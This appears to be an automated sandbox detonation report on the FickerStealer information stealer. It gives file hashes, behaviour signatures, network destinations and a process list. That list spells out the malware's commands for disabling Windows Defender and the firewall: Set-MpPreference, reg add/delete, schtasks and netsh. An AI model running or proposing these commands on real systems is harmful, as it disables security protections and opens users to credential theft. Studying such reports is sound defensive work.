memory/2040-47-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
| MD5 | b4cd27f2b37665f51eb9fe685ec1d373 |
| SHA1 | 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0 |
| SHA256 | 91f1023142b7babf6ff75dad984c2a35bde61dc9e61f45483f4b65008576d581 |
| SHA512 | e025f65224d78f5fd0abebe281ac0d44a385b2641e367cf39eed6aefada20a112ac47f94d7febc4424f1db6a6947bac16ff83ef93a8d745b3cddfdbe64c49a1e |
memory/1672-49-0x00000000028C0000-0x00000000028C1000-memory.dmp
memory/1672-52-0x000000001AA90000-0x000000001AA91000-memory.dmp
memory/1672-64-0x0000000002A00000-0x0000000002A01000-memory.dmp
memory/1672-65-0x000000001AAD0000-0x000000001AAD1000-memory.dmp
memory/1824-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1824-69-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1824-70-0x00000000024C0000-0x00000000024C1000-memory.dmp
memory/1824-71-0x000000001AD70000-0x000000001AD71000-memory.dmp
memory/1824-72-0x000000001ACF0000-0x000000001ACF2000-memory.dmp
memory/1824-73-0x000000001ACF4000-0x000000001ACF6000-memory.dmp
memory/1824-74-0x0000000002390000-0x0000000002391000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\x64btit.txt
| MD5 | 8e02df4b54e4444e9812ead4fabe7a28 |
| SHA1 | a7715b3098c2fa02adaced93a613963c39bb1d5d |
| SHA256 | d52167b633008ec6311264c9e0c0bc93c91640e503d37b695db4177e4e1bcd2b |
| SHA512 | 2b4c0d7f3e3457ec90a3e1a87e3e6747f9b26692875b587485f012d411d5865b10d4a4265d5285e46bf38bc1a236b7a0fc73fe1273982e864022c8b4840b2fe6 |
memory/1824-76-0x00000000022F0000-0x00000000022F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 17e62f51abf300be64442e8b3eb154d2 |
| SHA1 | 1304c56fc2290b390ac985a2fccda2f3568c0096 |
| SHA256 | 7c9e9ec28891fe09144ea647f3dff138bd58ba42599a8207ec29fdc7859d841d |
| SHA512 | 55f77bf80b6f282bc2da30e1f77ca637b1af05c9b80ed0e8f1b619a090e985eccddd82b9307ab0452cedfb472423597ccb9f10646b2878a460fd68abfafc3674 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7c0d5e51-802d-4619-9520-75f40ede6115
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_67fed384-9742-42bd-ab48-0dab5caef93b
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a7ab1e4-4080-418b-8531-9b5c85c91200
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd37edfd-ee25-4ff2-aabe-5183884f66b1
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3d373cec-bf72-49d9-a5bc-ac438d27a74f
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cda1b658-b784-4cfa-8068-23e0209d9883
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3e48dddf-4be9-404a-8382-f00ce9fa2701
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
memory/1964-85-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1964-88-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1964-92-0x000000001AC30000-0x000000001AC32000-memory.dmp
memory/1964-93-0x000000001AC34000-0x000000001AC36000-memory.dmp
memory/568-95-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/568-98-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/568-100-0x000000001AB00000-0x000000001AB02000-memory.dmp
memory/568-102-0x000000001AB04000-0x000000001AB06000-memory.dmp
memory/588-105-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/588-108-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/588-111-0x000000001A950000-0x000000001A952000-memory.dmp
memory/588-112-0x000000001A954000-0x000000001A956000-memory.dmp
memory/1540-115-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/1540-119-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1540-123-0x0000000002510000-0x0000000002512000-memory.dmp
memory/1540-124-0x0000000002514000-0x0000000002516000-memory.dmp
memory/1148-126-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1148-129-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1148-132-0x000000001AC30000-0x000000001AC32000-memory.dmp
memory/1148-133-0x000000001AC34000-0x000000001AC36000-memory.dmp
memory/1780-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1780-139-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1780-142-0x000000001AD00000-0x000000001AD02000-memory.dmp
memory/1780-144-0x000000001AD04000-0x000000001AD06000-memory.dmp
memory/1992-146-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1992-149-0x000007FEF5170000-0x000007FEF5B5C000-memory.dmp
memory/1992-151-0x000000001AE50000-0x000000001AE51000-memory.dmp
memory/1992-152-0x000000001ADD0000-0x000000001ADD2000-memory.dmp
memory/1992-153-0x000000001ADD4000-0x000000001ADD6000-memory.dmp
memory/1992-154-0x0000000002540000-0x0000000002541000-memory.dmp
memory/1992-155-0x00000000024A0000-0x00000000024A1000-memory.dmp
memory/1880-156-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
memory/1880-159-0x000007FEF4780000-0x000007FEF516C000-memory.dmp
memory/1880-163-0x000000001AD90000-0x000000001AD92000-memory.dmp
memory/1880-164-0x000000001AD94000-0x000000001AD96000-memory.dmp
memory/1880-165-0x00000000024D0000-0x00000000024D1000-memory.dmp
memory/1608-166-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | bebb7f3030ef1b957a6ce5653daa5a4a |
| SHA1 | 688472f5fb3b46abf26f6e8a2756b14926a75c3d |
| SHA256 | 0650742570b65b756088718cb216b1cd3b688d7dbaee8f863b257aab730389e4 |
| SHA512 | b7c4912ea415a7f358f224427aa32268e19cd9210473c7ebc6495026c423f632e7e66a26f7bfe004ff5604803ec44fcd897a68f5e43a99c4e05df425f9874ac8 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2021-01-28 10:48
Reported
2021-01-28 10:50
Platform
win10v20201028
Max time kernel
134s
Max time network
137s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
Osiris
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107723.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107750.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107750.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe | N/A |
Modifies Windows Firewall
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe | C:\Windows\SysWOW64\DllHost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wsuj.exe | C:\Windows\SysWOW64\DllHost.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
JavaScript code in executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Uses Tor communications
Enumerates physical storage devices
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3992 set thread context of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1611831107750.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe
"C:\Users\Admin\AppData\Local\Temp\FickerStealer.exe"
C:\Users\Admin\AppData\Local\Temp\1611831107723.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107723.exe"
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107750.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2BD8.tmp\2BD9.tmp\2BDA.bat C:\Users\Admin\AppData\Local\Temp\1611831107723.exe"
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3AD05575-8857-4850-9277-11B85BDB8E09}
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
"C:\Users\Admin\AppData\Local\Temp\1611831107750.exe"
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
"C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableScriptScanning $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -MAPSReporting 0"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.243.164.148:80 | api.ipify.org | tcp |
| N/A | 8.8.8.8:53 | mobilesuit.top | udp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 5.53.125.150:80 | mobilesuit.top | tcp |
| N/A | 193.23.244.244:80 | | tcp |
| N/A | 194.109.206.212:80 | | tcp |
| N/A | 204.13.164.118:80 | 204.13.164.118 | tcp |
| N/A | 8.8.8.8:53 | api.ipify.org | udp |
| N/A | 54.235.189.250:443 | api.ipify.org | tcp |
| N/A | 171.25.193.9:443 | 171.25.193.9 | tcp |
| N/A | 171.25.193.9:443 | 171.25.193.9 | tcp |
| N/A | 154.35.175.225:80 | | tcp |
| N/A | 193.23.244.244:80 | | tcp |
| N/A | 66.111.2.131:9030 | 66.111.2.131 | tcp |
| N/A | 193.218.118.62:80 | 193.218.118.62 | tcp |
| N/A | 178.254.45.64:443 | | tcp |
| N/A | 8.8.8.8:53 | time-a.nist.gov | udp |
| N/A | 129.6.15.28:13 | time-a.nist.gov | tcp |
| N/A | 139.99.98.191:80 | 139.99.98.191 | tcp |
| N/A | 148.251.192.160:443 | 148.251.192.160 | tcp |
| N/A | 107.189.10.237:80 | 107.189.10.237 | tcp |
| N/A | 195.135.194.134:80 | 195.135.194.134 | tcp |
| N/A | 178.17.170.77:80 | 178.17.170.77 | tcp |
| N/A | 38.145.200.67:443 | | tcp |
| N/A | 46.38.51.18:80 | 46.38.51.18 | tcp |
| N/A | 212.21.66.6:80 | 212.21.66.6 | tcp |
| N/A | 127.0.0.1:32767 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\1611831107723.exe
| MD5 | c4384a44c4f624cfb9b52fbf8116b786 |
| SHA1 | 10b43504bef3b004ade71f99784b3bde4e324e8d |
| SHA256 | ef98f9fd8e48c339bbb625437f4a19966c58c47f0e79e99ac320027debb9c9c3 |
| SHA512 | 05fb9b58bdf76635d0d2e4d05e6ca76ad7423a91b87d0bf825471c3afe0d714e863f86090db8fb1734a571841c96eb13449bfef4c04bdba1efecb3e3db15eb32 |
C:\Users\Admin\AppData\Local\Temp\1611831107750.exe
| MD5 | 8e8f7ff797c292231959e4dd410a98da |
| SHA1 | 5fba19ae9f76b445d96dbca71f53113492b09d49 |
| SHA256 | ace9f321c9967b2ffe3bef9056c113b20040fe8831351082e186125aeea8ab0b |
| SHA512 | c1e510a6d5f57eaad3b744e20145c07241b1e857e1a1832a0878cd6beedf115a40c8bfd655896d800579110687d208a59416044fdbd2811102aac334720a3c27 |
C:\Users\Admin\AppData\Local\Temp\2BD8.tmp\2BD9.tmp\2BDA.bat
| MD5 | 2df9441936169e60a9631bf730cd4273 |
| SHA1 | 979ee79524023a77b9577d077a3472b87fda9834 |
| SHA256 | 24ab289fe2d2dd6e86d9862bf5dac0f6c78acc444eb083152b3eaf84e041f95e |
| SHA512 | ab1e894b85c731e9ce84e0cabbab493935bec18e352bd397cf8b3172bb817e9b174069122180d1fc2d9e538864c1cd77fd5c18ce8dd2a45434c9c045f2bf39ee |
C:\Users\Admin\AppData\Local\Temp\GetX64BTIT.exe
| MD5 | b4cd27f2b37665f51eb9fe685ec1d373 |
| SHA1 | 7f08febf0fdb7fc9f8bf35a10fb11e7de431abe0 |
